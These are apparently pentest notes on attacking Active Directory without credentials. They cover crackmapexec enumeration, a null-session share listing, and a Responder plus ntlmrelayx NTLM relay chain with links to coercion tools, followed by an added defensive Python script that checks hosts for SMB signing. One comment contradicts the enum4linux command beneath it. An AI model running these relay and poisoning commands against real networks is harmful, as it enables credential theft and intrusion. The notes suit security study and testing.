#########
w/o Creds
#########

| First enumeration

.. code-block:: bash

    # Sweep the range per protocol to see which services answer
    RHOSTS="192.168.1.0/24"
    crackmapexec smb $RHOSTS
    # Try a guest/null-style login ('a' with an empty password) and list shares
    crackmapexec smb $RHOSTS -u 'a' -p '' --shares
    crackmapexec rdp $RHOSTS
    crackmapexec winrm $RHOSTS
    crackmapexec ldap $RHOSTS
    crackmapexec wmi $RHOSTS
    # enum4linux expects a single host rather than a CIDR range
    enum4linux $RHOSTS

|

*************
NetNTLM Relay
*************

| https://beta.hackndo.com/ntlm-relay/
| https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html
| Responder answers any broadcast name-resolution request (MDNS, LLMNR ..) and triggers authentication
| ntlmrelayx relays the resulting NetNTLMv2 authentication to targets
| Possible targets are servers that do not enforce SMB signing; cme (crackmapexec) can list them

.. code-block:: bash

    # List hosts that do not require SMB signing
    cme smb 192.168.0.0/24 --gen-relay-list /tmp/targets.txt
    # Relay incoming authentication to the hosts in the target file
    ntlmrelayx.py -smb2support --no-http-server -ip 192.168.45.208 -w -tf /tmp/targets.txt
    # Answer name-resolution requests on the tun0 interface
    sudo responder -I tun0 -w

|
| You can try to force NTLM authentication
| https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/printers-spooler-service-abuse
| https://github.com/p0dalirius/Coercer
|
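
The relay-target criterion above (servers that do not enforce SMB signing) comes down to one field of the SMB2 NEGOTIATE response. The following is an added example, not part of the original notes: it decodes that field from captured responses so you can confirm which hosts still need signing enforced. The host addresses and response bytes are constructed samples, and the function names are hypothetical.

```python
import struct

SMB2_MAGIC = b"\xfeSMB"
SIGNING_ENABLED = 0x0001   # SMB2_NEGOTIATE_SIGNING_ENABLED
SIGNING_REQUIRED = 0x0002  # SMB2_NEGOTIATE_SIGNING_REQUIRED

def parse_negotiate_response(msg: bytes) -> dict:
    """Decode the signing policy from an SMB2 NEGOTIATE response (transport prefix stripped)."""
    if len(msg) < 70:  # 64-byte header + first 6 bytes of the body
        raise ValueError("truncated SMB2 message")
    magic, hdr_size, _, status, command, _, flags = struct.unpack_from("<4sHHIHHI", msg, 0)
    if magic != SMB2_MAGIC or hdr_size != 64:
        raise ValueError("not an SMB2 message")
    # Command 0 is NEGOTIATE; flag bit 0x1 marks a server-to-client message
    if command != 0 or not flags & 0x1 or status != 0:
        raise ValueError("not a successful NEGOTIATE response")
    body_size, security_mode, dialect = struct.unpack_from("<HHH", msg, 64)
    if body_size != 65:
        raise ValueError("unexpected NEGOTIATE body size")
    return {
        "dialect": f"0x{dialect:04x}",
        "signing_enabled": bool(security_mode & SIGNING_ENABLED),
        "signing_required": bool(security_mode & SIGNING_REQUIRED),
    }

def audit(captures: dict) -> tuple:
    """Return (hosts that do not require signing, [(host, parse error), ...])."""
    missing, errors = [], []
    for host, raw in sorted(captures.items()):
        try:
            info = parse_negotiate_response(raw)
        except ValueError as exc:
            errors.append((host, str(exc)))  # unknown state: review by hand
            continue
        if not info["signing_required"]:
            missing.append(host)
    return missing, errors

def _sample(security_mode: int, dialect: int = 0x0311) -> bytes:
    """Constructed response: only the fields parsed above carry meaningful values."""
    header = struct.pack("<4sHHIHHIIQIIQ16s", SMB2_MAGIC, 64, 0, 0, 0, 1, 0x1, 0, 0, 0, 0, 0, b"")
    return header + struct.pack("<HHH", 65, security_mode, dialect) + bytes(59)

SAMPLES = {  # constructed data using documentation addresses
    "192.0.2.10": _sample(SIGNING_ENABLED | SIGNING_REQUIRED),
    "192.0.2.11": _sample(SIGNING_ENABLED),
    "192.0.2.12": b"\x00" * 10,
}

if __name__ == "__main__":
    print(audit(SAMPLES))
```

A host that reports signing as enabled but not required still appears in the first list, because only the required bit makes the server reject unsigned sessions.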